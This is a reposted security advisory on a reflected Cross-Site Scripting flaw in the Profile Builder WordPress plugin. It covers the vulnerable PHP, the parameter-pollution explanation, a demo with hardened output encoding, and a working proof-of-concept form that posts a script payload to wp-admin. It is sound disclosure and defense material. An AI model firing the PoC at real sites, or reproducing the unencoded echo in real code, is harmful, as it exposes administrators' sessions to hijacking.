wp_builder plugin css

Jul 13th, 2016
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Profile Builder WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Profile Builder
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged-on WordPress
Administrator into opening a malicious website, which submits a crafted
POST request to the WordPress admin interface on the Administrator's
behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0014

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Profile Builder - front-end user
registration, user profile and user login WordPress Plugin version
2.4.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Profile Builder version 2.4.2.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_profile_builder_wordpress_plugin.html

The issue exists in the file class-email-confirmation.php and is caused
by the lack of output encoding of the page request parameter, which is
written straight into the value attribute of a hidden form field. The
vulnerable code is listed below.

<form id="movies-filter" method="get">
   <!-- For plugins, we also need to ensure that the form posts back to our current page -->
   <input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
   <!-- Now we can render the completed list table -->
   <?php $listTable->display() ?>
</form>

Normally, the page URL parameter is validated by WordPress: wp-admin
dispatches plugin admin pages on $_GET['page'] and only routes the
request to a plugin when that value matches a registered menu page, so
an arbitrary value never reaches the plugin's callback. This prevents
Cross-Site Scripting via the query string. However, in this case the
value of page is obtained from $_REQUEST, not from $_GET. PHP builds
$_REQUEST by merging $_GET and $_POST (and $_COOKIE when variables_order
rather than request_order is in effect), with later sources overwriting
earlier ones, so under the default request_order of "GP" a POST
parameter overrides a GET parameter of the same name. This allows for
parameter pollution: the attacker puts a benign, valid page value in the
URL, so that WordPress routes the request to the plugin's page, and
simultaneously submits a malicious page value as a POST parameter, which
is the one that ends up unencoded in the value attribute. As the proof
of concept shows, the POST can be submitted from a form on an
attacker-controlled site; no nonce or other token is required to reach
the rendering code.
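The following is an added example, not code from Profile Builder or from the advisory. It emulates how PHP populates $_REQUEST from $_GET and $_POST under the default request_order of "GP", renders the advisory's vulnerable pattern with the polluted value, and shows a hardened rendering beside it. htmlspecialchars() stands in for WordPress' esc_attr(), which is not available outside WordPress; build_request(), render_vulnerable() and render_hardened() are names chosen for this example, and the sample request data is constructed to mirror the proof of concept.

```php
<?php
// Added example: not code from the Profile Builder plugin or the advisory.
// Assumption: PHP's default request_order of "GP" (GET first, then POST
// overriding). htmlspecialchars() stands in for WordPress' esc_attr().
declare(strict_types=1);

/**
 * Emulate how PHP builds $_REQUEST from $_GET and $_POST.
 * Sources are applied in the order given; a later source overwrites keys
 * of the same name from an earlier one, so with "GP" POST beats GET.
 */
function build_request(array $get, array $post, string $order = 'GP'): array
{
    $request = [];
    foreach (str_split($order) as $source) {
        $bucket = $source === 'G' ? $get : ($source === 'P' ? $post : []);
        foreach ($bucket as $key => $value) {
            $request[$key] = $value;
        }
    }
    return $request;
}

/** The advisory's vulnerable pattern: $_REQUEST['page'] echoed unencoded into an attribute. */
function render_vulnerable(array $request): string
{
    return '<input type="hidden" name="page" value="' . ($request['page'] ?? '') . '" />';
}

/**
 * Hardened rendering: take the slug from the array WordPress actually
 * validated ($_GET) and attribute-encode it (esc_attr() inside WordPress).
 * Encoding alone already neutralises the payload, so it also protects a
 * caller that still passes the polluted $_REQUEST array.
 */
function render_hardened(array $params): string
{
    $page = isset($params['page']) && is_string($params['page']) ? $params['page'] : '';
    $encoded = htmlspecialchars($page, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="page" value="' . $encoded . '" />';
}

// Constructed sample request mirroring the proof of concept: a benign,
// registered slug in the query string and the payload in the POST body.
$get  = ['page' => 'unconfirmed_emails'];
$post = ['page' => '"<script>alert(document.cookie);</script>'];

$request = build_request($get, $post);

echo "\$_GET['page']     = {$get['page']}\n";
echo "\$_REQUEST['page'] = {$request['page']}\n\n";

echo "Vulnerable output (breaks out of the attribute):\n";
echo render_vulnerable($request) . "\n\n";

echo "Hardened output from \$_GET:\n";
echo render_hardened($get) . "\n\n";

echo "Hardened output even from the polluted \$_REQUEST:\n";
echo render_hardened($request) . "\n";
```

Run it with `php pollution.php`. The vulnerable line prints `value=""<script>alert(document.cookie);</script>" />`, i.e. the leading double quote closes the attribute and the script tag lands in the page; both hardened lines print a quoted, entity-encoded value. Reading from $_GET restores the validation WordPress already performed on the routing parameter, and encoding on output is the defence that holds regardless of where the value came from; a fix should do both.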
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------

<html>
   <body>
      <!-- The benign page value in the query string satisfies WordPress'
           validation of $_GET['page']; the POST parameter of the same name
           overrides it in $_REQUEST and is reflected without encoding. -->
      <form action="http://<target>/wp-admin/users.php?page=unconfirmed_emails" method="POST">
         <!-- The payload starts with a double quote so that it closes the
              value="..." attribute in the vulnerable output. It is written
              as &quot; here so the attacker's own page parses the whole
              payload as the field's value; a bare quote would end the
              attribute early and submit an empty value. -->
         <input type="hidden" name="page" value="&quot;<script>alert(document.cookie);</script>" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>

#  0day.today [2016-07-13]  #